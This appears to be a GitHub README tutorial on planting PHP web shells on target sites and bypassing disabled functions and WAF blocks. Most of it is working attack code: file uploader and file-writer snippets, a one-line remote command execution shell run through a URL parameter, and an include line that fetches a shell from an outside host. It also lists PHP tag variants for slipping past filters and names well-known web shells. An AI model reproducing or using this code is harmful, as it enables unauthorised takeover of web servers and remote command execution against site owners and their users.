
Shell Bypass Tutorial for disabled functions and Error 406.

Primary LanguagePHP

PHP Shell Uploading Scripts and Bypass


  1. Normal File Uploader
    echo 'Uploader<br>';
    echo '<form action="" method="post" enctype="multipart/form-data">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        if(copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo '<b>Success</b><br><br>';
        }else {
            echo '<b>Failed</b><br><br>'; 
  1. CSRF File Uploader

This uploader bypasses content length if the normal file uploader code is too long. To access this, open the file where you save it and do a CSRF with POST file value of file.

	copy($_FILES['file']['tmp_name'], $_FILES['file']['name']);

This saves your file to the same directory of the uploader.

  1. File Get Contents

Will work if allow_url_fopen is on. Upload this as up.php then open it. It will automatically generate a file named shell.php on the same directory.

  1. File Writer (link)

If you managed to make a file uploader but it doesn't work, maybe the site does not allow uploading. Some sites don't enable upload functions, hence move_uploaded_files and copy_uploaded_files will not work. File writer works by using different command (fwrite).

    $a = $_POST['code'];
    $file = fopen($_POST['file'],'w');
  <form method="post" id="form">
    <h2>File Writer</h2>
    File Name<br><input type="text" name="file" placeholder="shell.php"><br>
    Shell Code<br><textarea name="code" form="form" placeholder="Paste your shell here"></textarea><br>
    <input type="submit" value="Write">

If all of the above fails or is blocked by WAF, try using other php notations.

a. <?php echo 'sample'; ?> - normal one

b. <? echo 'sample'; ?> - will work if short_open_tag is enabled

c. <% echo 'sample'; %> - PHP < 7.0.0

d. <script language="php"> echo 'sample'; </script> - PHP < 7.0.0

Shell Codes I use

  1. b374k

This shell is large >900kb. The size is large which gives room to more functionality. But more functionality means more functions used, and more functions used results to more DISABLE_FUNCTIONS which might result again to error in shell or blocked by WAF.

  1. RBBD priv8 shell

I think this is a "so called" bypass shell.It is light weight, around ~70kb. I think it is based on wso.php web shell

  1. b374k-mini

File size is ~14kb and bypasses as well some WAFs while uploading

  1. RCE shell

I use this when we need to upload a shell with very small file size


This is a shorthand notation for <?php echo shell_exec($_GET['1']);?>. But note that this only works if shell_exec is not in the DISABLE_FUNCTIONS in phpinfo. To access this, just /shell.php?1=whoami

  1. Include

Used for bypassing file size as well due to its small size.

<?php include('https://somewebshell.com/shell.txt');?>

This will work only if allow_url_include is ON in phpinfo.